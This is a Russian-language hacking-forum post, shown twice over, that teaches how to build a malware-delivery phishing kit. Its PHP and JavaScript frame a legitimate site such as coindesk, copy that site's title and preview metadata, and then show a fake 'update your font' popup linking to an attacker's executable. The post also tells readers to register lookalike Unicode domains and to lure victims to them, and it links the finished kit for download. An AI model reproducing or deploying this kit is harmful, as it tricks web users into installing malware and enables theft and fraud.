Admin
Администратор
Идея заключается в более-менее универсальном способе точечного впаривания exe (а возможно и не только) целевой аудитории
Я думаю только ленивый не слышал о нашумевшей не так давно кампании Hoefler Text, когда на шеллы заливался лендинг-имплант предлагавший "установить шрифт"
Сегодня мы попытаемся повторить что-то эдакое, только без необходимости ломать целевой ресурс - мы постараемся его универсально подделать.
Для начала, создадим незамысловатую структуру файлов (тут и далее будем писать на РНР и немного JS):
В style.css внесем самые обычные стили
Вся задумка заключается в том, что для отображения контента мы не будем парсить и проксировать сайт-донор, а отобразим его во фрейме на стороне клиента (так мы убережемся и от неправильного парсинга, например из-за прокладок и DDOS-защит и самое главное сохраним куки пользователя - если он авторизован на сайте-доноре он увидит все свои привычные настройки и свою сессию). Фрейм бы будем вкладывать в еще один фрейм (для обхода сайтов которые проверяют window.opener и window.top), дабы избежать "выхода" донора из фрейма
Итого, нам нужно :
1) Показать во фрейме на весь экран оригинальный ресурс (любую его страницу)
2) Подождать пару секунд (дать пользователю сконцентрировать на ней внимание)
3) Отобразить модальное окошко с предложением скачать и установить шрифт
Забегая наперед, для одной из страниц сайта coindesk выглядеть это будет вот так :
Итак, сказано - сделано. Приступим к простому коду нашей системы :
В файл index.php внесем такой код :
Здесь мы сначала декодируем параметр (целевую страницу) который пришел нам в GET, затем пытаемся забрать ее http-тело, из которого в последствии вырежем содержимое тега <BODY>
Делается это для того, что бы забрать содержимое HEAD (которое мы включаем в страницу) и подменить во-первых заголовок страницы, а во-вторых подменить очень важные для нас meta
rg параметры
Видели как социальные сети и мессенджеры на лету генерят превьюхи для новостников? Сфейканая таким образом страница будет выглядеть на превью абсолютно идентично, благодаря забору этих аттрибутов
Тот же зафейканый coindesk :
Осталось сделать саму модалку - использовать будем встроенную в bootstrap. Ниже приведен код frame.php
Соотвественно для работы, линк http://your-super-site.com/file.exe нужно будет заменить на свой exe doc zip cab а текст разводки отредактировать под себя.
Обобщая, рецепт успеха таков :
1. Кодируем нужный url в base64 БЕЗ http, например coindesk.com/topped-out-bitcoin-flirts-with-short-term-bearish-reversal/ превратится в Y29pbmRlc2suY29tL3RvcHBlZC1vdXQtYml0Y29pbi1mbGlydHMtd2l0aC1zaG9ydC10ZXJtLWJlYXJp
c2gtcmV2ZXJzYWwv. Кодировать можно например на base64.ru
2. Заливаем фейк на домен (конечно берем максимально похожий, например с кириллицей или иным юникодом)
3. Шем пользователя на страницу your-fake-domain.com/index.php?u=YOUR_BASE64_HERE
4. ???
5. PROFIT!!!
Идея безусловно нуждается в доработке, однако считаю такое направление в подделке страниц весьма перспективным
Говнокод написаный на бегу можно скачать здесь :
https://www.sendspace.com/file/yg9bqq
Всех с наступающим!
Я думаю только ленивый не слышал о нашумевшей не так давно кампании Hoefler Text, когда на шеллы заливался лендинг-имплант предлагавший "установить шрифт"
Сегодня мы попытаемся повторить что-то эдакое, только без необходимости ломать целевой ресурс - мы постараемся его универсально подделать.
Для начала, создадим незамысловатую структуру файлов (тут и далее будем писать на РНР и немного JS):
В style.css внесем самые обычные стили
Код:
html,body{
height:100%;
overflow:hidden;
}
*{
margin:0px;
padding:0px;
}
iframe{
height:100%;
width: 100%;
border:none;
}Итого, нам нужно :
1) Показать во фрейме на весь экран оригинальный ресурс (любую его страницу)
2) Подождать пару секунд (дать пользователю сконцентрировать на ней внимание)
3) Отобразить модальное окошко с предложением скачать и установить шрифт
Забегая наперед, для одной из страниц сайта coindesk выглядеть это будет вот так :
Итак, сказано - сделано. Приступим к простому коду нашей системы :
В файл index.php внесем такой код :
Код:
<?php
$origUrl = base64_decode(urldecode($_GET['u']));
$pageSource = file_get_contents("http://".$origUrl);
$pageSource = preg_replace("/<body(.+)<.body>/sim", " ",$pageSource);
$pageSource = str_replace(".js", ".404js",$pageSource);
$pageSource = str_replace(".css", ".404css",$pageSource);
?>
<?php
echo $pageSource;
?>
<body>
<link rel="stylesheet" href="style.css"/>
<iframe src="frame.php?u=<?= $_GET["u"] ?>" scroll="no"></iframe>
</body>
</html>Делается это для того, что бы забрать содержимое HEAD (которое мы включаем в страницу) и подменить во-первых заголовок страницы, а во-вторых подменить очень важные для нас meta
rg параметрыВидели как социальные сети и мессенджеры на лету генерят превьюхи для новостников? Сфейканая таким образом страница будет выглядеть на превью абсолютно идентично, благодаря забору этих аттрибутов
Тот же зафейканый coindesk :
Осталось сделать саму модалку - использовать будем встроенную в bootstrap. Ниже приведен код frame.php
Код:
<?php
$origUrl = base64_decode(urldecode($_GET['u']));
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title></title>
<link rel="stylesheet" href="style.css">
<link rel="stylesheet" href="https://v4-alpha.getbootstrap.com/dist/css/bootstrap.min.css" type="text/css" />
<script src="//code.jquery.com/jquery-latest.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/tether/1.4.3/js/tether.min.js"></script>
<script src="https://v4-alpha.getbootstrap.com/dist/js/bootstrap.min.js"></script>
</head>
<body>
<div class="modal fade" id="myModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
<div class="modal-dialog" role="document">
<div class="modal-content">
<div class="modal-header">
<h5 class="modal-title" id="exampleModalLabel"><img src="http://tech-files.com/wp-content/uploads/2017/09/chrome_1-664x374.jpg" height="80px" /></h5>
</button>
</div>
<div class="modal-body">
<div class="container-fluid">
<div class="col-xs-8">
This webpage requires updated version of <b>OpenSans</b> font<br/>
Please, install it by clicking <a href="http://your-super-site.com/file.exe">here</a>
</div>
</div>
</div>
</div>
</div>
</div>
<iframe src="//<?= $origUrl ?>"></iframe>
<script>
$(document).ready(function(){
setTimeout(function(){
$("#myModal").modal();
},1300);
})
</script>
</body>
</html>Соотвественно для работы, линк http://your-super-site.com/file.exe нужно будет заменить на свой exe doc zip cab а текст разводки отредактировать под себя.
Обобщая, рецепт успеха таков :
1. Кодируем нужный url в base64 БЕЗ http, например coindesk.com/topped-out-bitcoin-flirts-with-short-term-bearish-reversal/ превратится в Y29pbmRlc2suY29tL3RvcHBlZC1vdXQtYml0Y29pbi1mbGlydHMtd2l0aC1zaG9ydC10ZXJtLWJlYXJp
c2gtcmV2ZXJzYWwv. Кодировать можно например на base64.ru
2. Заливаем фейк на домен (конечно берем максимально похожий, например с кириллицей или иным юникодом)
3. Шем пользователя на страницу your-fake-domain.com/index.php?u=YOUR_BASE64_HERE
4. ???
5. PROFIT!!!
Идея безусловно нуждается в доработке, однако считаю такое направление в подделке страниц весьма перспективным
Говнокод написаный на бегу можно скачать здесь :
https://www.sendspace.com/file/yg9bqq
Всех с наступающим!
